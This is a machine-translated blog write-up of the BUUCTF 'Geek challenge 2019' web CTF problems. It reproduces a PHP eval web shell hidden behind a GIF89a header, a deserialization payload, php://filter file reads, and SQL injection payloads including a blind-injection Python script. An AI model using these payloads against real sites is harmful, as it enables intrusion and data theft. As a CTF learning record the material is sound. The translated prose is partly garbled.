当前位置:网站首页>Geek challenge 2019 (review the loopholes)

Geek challenge 2019 (review the loopholes)

2022-07-26 23:55:00 Occasionally dodge dark clouds 334

Catalog

[ Geek challenge 2019]Upload

A file upload question , This solution has been encountered before

[ Geek challenge 2019]PHP

[ Geek challenge 2019]Havefun

It's really easy to finish this problem

[ Geek challenge 2019]Secret File

[ Geek challenge 2019]Http

[ Geek challenge 2019]Knife

[ Geek challenge 2019]BuyFlag

SQL Inject the topic

[ Geek challenge 2019]EasySQL

​ edit

[ Geek challenge 2019]LoveSQL

1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name="l0ve1ysq1" #

[ Geek challenge 2019]BabySQL

[ Geek challenge 2019]HardSQL

[ Geek challenge 2019]FinalSQL

 

[ Geek challenge 2019]Upload

A file upload question , This solution has been encountered before

First try .php, It must be filtered

Then upload the image code and find , It also detects the contents of the file

It was found that the beginning of the Trojan horse was filtered , But we also met earlier that labels can replace this

 <script language='php'>eval($_POST['shell‘]);</script>

  Then it's still wrong

Go back and say that you deceived it , Then I thought about whether to verify the file header

Add one more GIF89a

  Sure enough, the upload was successful , Then chain suggestion is ok , Need to put 2.jpg Change to 2.phtml Only then can , Be resolved

http://4c926abd-6b99-412d-88df-d1d3d42a7d3b.node4.buuoj.cn:81/upload/2.phtml

shell link

  get flag

  Tested it 2.phtml Sure enough, there is an echo. Take a look at the environment

It shows that the upload is really successful ,shell It's the password of the Trojan horse  

[ Geek challenge 2019]PHP

A topic of deserialization

Open the interface without anything , Just a cat , Then I looked at the source code , either

This is usually a backup file , Actually, I don't like backing up files , Scanning the directory is too slow , open dirsearch Scan the directory , Actually, I tried it first index.php.bak Found no , It's out www.zip

Common website source code backup file suffix :

tar.gz,zip,rar,tar

Common website source code backup file name :

web,website,backup,back,www,wwwroot,temp

  Unzip three files ,class.php,flag.php,index,php

But turn it on flag At first glance, it's fake ,

<?php
include 'flag.php';


error_reporting(0);


class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();

            
        }
    }
}
?>

Construct a deserialization chain , There's a hole in this, which is , The previous definition of the attribute is private, Need to add %00 Class name %00, For this question %00Name%00 This is a 6 Bytes %00 It's a

The simple structure omits , direct

O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}

  But what makes me waste my time is , I can't find what the output variable is , Finally, I saw wp Find out index.php At the bottom is

 

 ?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}

obtain flag

[ Geek challenge 2019]Havefun

It's really easy to finish this problem

First open the interface

Used to look at the source code first , little does one think , There is really

  Output ?cat=dog It outputs flag, I tried it and it turned out to be right

  Really Kaisen

[ Geek challenge 2019]Secret File

Open the interface for one second ,  The old rule is to look at the source code first

See an address to visit , 

Let me think of a Too fast to capture the problem , Find the click secret after , Jump to end.php

The source code should have hyperlinks

I saw it action.php, Then grab the bag and remember ,action.php Written in get Where?  

  visit secr3t.php See the source code 

<html>
    <title>secret</title>
    <meta charset="UTF-8">
<?php
    highlight_file(__FILE__);
    error_reporting(0);
    $file=$_GET['file'];
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
        echo "Oh no!";
        exit();
    }
    include($file); 
//flag On the flag.php in 
?>
</html>

In fact, it means , It's filtered out ../ tp input data

Then use pseudo Protocol ,filter You can get flag

?file=php://filter/read=convert.base64-encode/resource=flag.php

remember url Want to have secr3t.php Because this is the source interface

  There is base64 Code to get flag

[ Geek challenge 2019]Http

Open the interface ,

Look at the code , See a hyperlink secret.php Visit

  Grab the bag and change the position , You are not from this website , So add a Referer

Then I made a request , You didn't use this thing Syclover Browse

User Agent The Chinese name is user agent , abbreviation UA, It's a special string header , Enables the server to identify the operating system and version used by the client 、CPU type 、 Browsers and versions 、 Browser rendering engine 、 Browser language 、 Browser plug-ins, etc . 

You can only access with your local address , Have a try X-Forwarded-For :127.0.0.1

flag Come out , Trapped in  

User Agent I don't know if I can change the browser access ,

[ Geek challenge 2019]Knife

  It feels like a problem of command execution , But I tried for a long time , You can't pass on parameters

At last, I got the idea , This is not a sentence, Trojan horse , Tested it Syc=phpinfo();

Then the suggestion is directly linked , end  , A sign in question

[ Geek challenge 2019]BuyFlag

Enter the page , Check the source code directly , I saw a clue

visit ,pay.php 

It suggests only cuitstudent Students can buy flag

Then continue to check the source code , Found out

Weak comparison , Pass in 404%00, The system will automatically recognize that it is not a number

post The ginseng , But it's wrong to try several times , I remembered that it must be cuit Of the students ,burp Grab the bag

stay Request In request ,Cookie: user=0, Here is the location of identity judgment , In Boolean 0 by false,1 by true, We changed it to Cookie: user=1 To authenticate .

  Identity success ,

 

  because

Need to buy , So the introduction money, But it reminds me that the length is too long ,

Show Nember lenth is too long There should be a length limit , There are two ways to bypass
1、 Scientific counting bypasses money=1e9
2、 Array bypassing money[]=1   

SQL Inject the topic

[ Geek challenge 2019]EasySQL

1、 Try using an account admin、 password 123456 land , Some common account passwords , The page prompts the wrong user name 、 password ;
2、 Try closing again , Account number input 1,1’,1" Judge , When the input is 1’ Times wrong , Therefore, the judgment result statement should be closed with single quotation marks ( Tips : Remember to fill in the password )

I've come to the conclusion that , Single quotation mark closing , Then try the universal password

1' or true# (# In order to omit the following quotation marks )

Write the password casually ,# Will be ignored

obtain flag

[ Geek challenge 2019]LoveSQL

First, judge the way of closing , Find out 1‘ Will report a mistake

Then try using the universal password   

Get this interface , Then I tried it and found it useless                 

Start looking for ideas again , Try joint injection

1' union select 1,2,3#  Judge the echo position

  Query the database 1' union select 1,database(),3 # The database queried is geek

continue 1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema="geek" #

Two watches feel in In the following table

1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name="l0ve1ysq1" #

  It feels like password in

1' union select 1,group_concat(password),group_concat(username) from l0ve1ysq1#

By the way, I reviewed the joint injection

[ Geek challenge 2019]BabySQL

The old method judges the closing mode first , It's still single quotation marks

Try universal password discovery , Echo is different from what I entered

Input 1' or true#

  But not when echoing or, It should be or Filtered into spaces , I found that case filtering is not good , Then try double write injection ,oorr success

Similar to the previous question , I feel that this question will filter some commonly used functions

1' union select 1,2,3#

  Find a union select It's all filtered , Continue double writing to bypass

1' uniunionon selselectect 1,2,3#

1' uniunionon selselectect 1,database(),3# still geek database

1' uniunionon selselectect 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()# 

information Filtered again   from either

because or The filtered , therefore information It's not immune

1' uniunionon selselectect 1,group_concat(table_name),3 frfromom infoorrmation_schema.tables where table_schema=database()#

Find out where It's also filtered

1' uniunionon selselectect 1,group_concat(table_name),3 frfromom infoorrmation_schema.tables whewherere table_schema=database()# 

It's a success , It feels like the first table name

 1' uniunionon selselectect 1,group_concat(column_name),3 frfromom infoorrmation_schema.columns whewherere table_name="b4bsql"# 

  1' uniunionon selselectect 1,group_concat(password),3 frfromom b4bsql# 

After trying for a long time, I found that it was wrong , See if the echo doesn't exist passwd Oh , Turned out to be password Of or It is also filtered out and bypassed

1' uniunionon selecselectt 1,group_concat(passwoorrd),3 frfromom b4bsql#

If

If the interface overlaps , Just reduce the scale  

[ Geek challenge 2019]HardSQL

Open the website and try the previous method , I found that the echo is all one sentence

union select etc. , Joint injection is filtered out

Then I think of using error reporting injection

This is the XOR method used ^. Single quotation marks are closed positions , There will be an error , Then splice the back   extractvalue Is there a special symbol in it that will inject errors  0x7e Is a special symbol

1'^extractvalue(1,concat(0x7e,(select(database()))))#

Then query the table name  

1'^extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where((table_schema)like('geek')))))#

~H4rDsq1

Field name

1'^extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where((table_name)like('H4rDsq1')))))#

password

1'^extractvalue(1,concat(0x7e,(select(right(group_concat(password),30))from(H4rDsq1))))#

  Find incomplete and use left and right Splicing can get flag

flag{d015f65f-ddd0-4886-87a1-9        left

 '~f-ddd0-4886-87a1-94d5a3c6bcb2}    right

flag{d015f65f-ddd0-4886-87a1-94d5a3c6bcb2}

[ Geek challenge 2019]FinalSQL

This is the case when the interface is opened , Then click open one by one and find only id It has changed  

  This question , Also filtered a lot , See that the title shows sql Blind note , So I thought of

Note that the injection point should be id This position , We type in :id=6'

You can also use XOR to inject ,1^0=1,1^1=0,0^0=0

 

  If found, jump to the error reporting interface ,

import requests
flag=''
for i in range(1,250):
	left=32
	right=128
	mid=(left+right)//2
	while(left<right):
		res=requests.get('http://e487615c-08e4-4b1d-a3d2-fae355b974c9.node3.buuoj.cn/search.php?id=1^(ascii(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)'%(i,mid))
		if 'ERROR' in res.text:
			left=mid+1
		else:
			right=mid
		mid=(left+right)//2
	if(mid==32 || mid==127):
		break
	flag=flag+chr(mid)
	print(flag)

  Table name 

res=requests.get('http://e4bf984f-85ef-4713-9180-1aaa9c19c08c.node4.buuoj.cn:81/search.php?id=1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)=database()),%d,1))>%d)'%(i,mid))

F1naI1y,Flaaaaag

Field name 

res = requests.get('http://e4bf984f-85ef-4713-9180-1aaa9c19c08c.node4.buuoj.cn:81/search.php?id=1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)="Flaaaaag"),%d,1))>%d)'%(i,mid))

id,fl4gawsl

res = requests.get('http://e4bf984f-85ef-4713-9180-1aaa9c19c08c.node4.buuoj.cn:81/search.php?id=1^(ascii(substr((select(group_concat(fl4gawsl))from(Flaaaaag)),%d,1))>%d)'%(i,mid))

The difficulty of this problem lies in , Don't play according to the routine ,Flaaaag Inside f14gawsl Field , When the value inside NO, real flag stay F1nal1y Inside the watch password Field

 

That's it , Next, I want to focus on rce No echo way , come on. !

day day up!

原网站

版权声明
本文为[Occasionally dodge dark clouds 334]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/200/202207180853360618.html

边栏推荐

猜你喜欢

随机推荐